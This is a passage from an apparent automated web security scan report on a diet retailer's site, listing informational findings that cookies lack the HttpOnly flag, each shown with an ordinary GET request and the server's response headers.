Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; DYN_USER_ID=242836360; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; NSOfmCookieMarker=exclude

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 02:48:28 GMT
Server: Apache
Last-Modified: Wed, 17 Nov 2010 09:59:47 GMT
ETag: "200a8c-45f-4953cbbc48ea0"
Accept-Ranges: bytes
Content-Length: 1119
Content-Type: application/javascript
Set-Cookie: BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; path=/

function omni_track(A){s.linkTrackVars="prop25,eVar25,events";s.linkTrackEvents="event35";s.prop25=s.pageName;s.eVar25=s.pageName+":"+A;s.events="event35";s.tl(this,"o",A)}
function reset_omni_page(A
...[SNIP]...

6.25. http://www.nutrisystem.com/jsps_hmr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/ HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:23 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:23 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Location: http://www.nutrisystem.com/jsps_hmr/home/index.jsp?_requestid=621573
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

6.26. http://www.nutrisystem.com/jsps_hmr/about/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/about/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/about/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:24 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:24 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

6.27. http://www.nutrisystem.com/jsps_hmr/careers/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/careers/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/careers/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:24 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:24 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

6.28. http://www.nutrisystem.com/jsps_hmr/catalog/menu/food.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/menu/food.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/catalog/menu/food.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:25 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:25 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="P3P" content='pol
...[SNIP]...

6.29. http://www.nutrisystem.com/jsps_hmr/common/assignCampaign.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/common/assignCampaign.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/common/assignCampaign.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:40 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:40 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:40 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:53:40 GMT
Connection: close

A valid siteId is required! This is not valid: null

6.30. http://www.nutrisystem.com/jsps_hmr/common/templates/body_assessment_form_v15.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/common/templates/body_assessment_form_v15.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/common/templates/body_assessment_form_v15.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:25 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:25 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:57:24 GMT
Connection: close

<script type="text/javascript" src="/js/trim_spaces.js"></script>
<script language="JavaScript">
   function bodyLeadSource(){
       if(s && s.pageName){
           $('#leadOriginated').attr('value',s.pageName)
...[SNIP]...

6.31. http://www.nutrisystem.com/jsps_hmr/corporate/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/corporate/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/corporate/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:26 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:26 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

6.32. http://www.nutrisystem.com/jsps_hmr/faq/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/faq/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/faq/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:26 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:26 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

6.33. http://www.nutrisystem.com/jsps_hmr/giftcards/giftcard_selection_page.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/giftcards/giftcard_selection_page.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/giftcards/giftcard_selection_page.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:27 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:27 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:57:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html class="dj_gecko dj_ff3 dj_contentbox">
<head>
<meta http-equiv="Content-Type" con
...[SNIP]...

6.34. http://www.nutrisystem.com/jsps_hmr/guarantee/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/guarantee/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/guarantee/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:27 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:27 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" c
...[SNIP]...

6.35. http://www.nutrisystem.com/jsps_hmr/guided_selling/ajaxErrorUrl.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/guided_selling/ajaxErrorUrl.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/guided_selling/ajaxErrorUrl.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
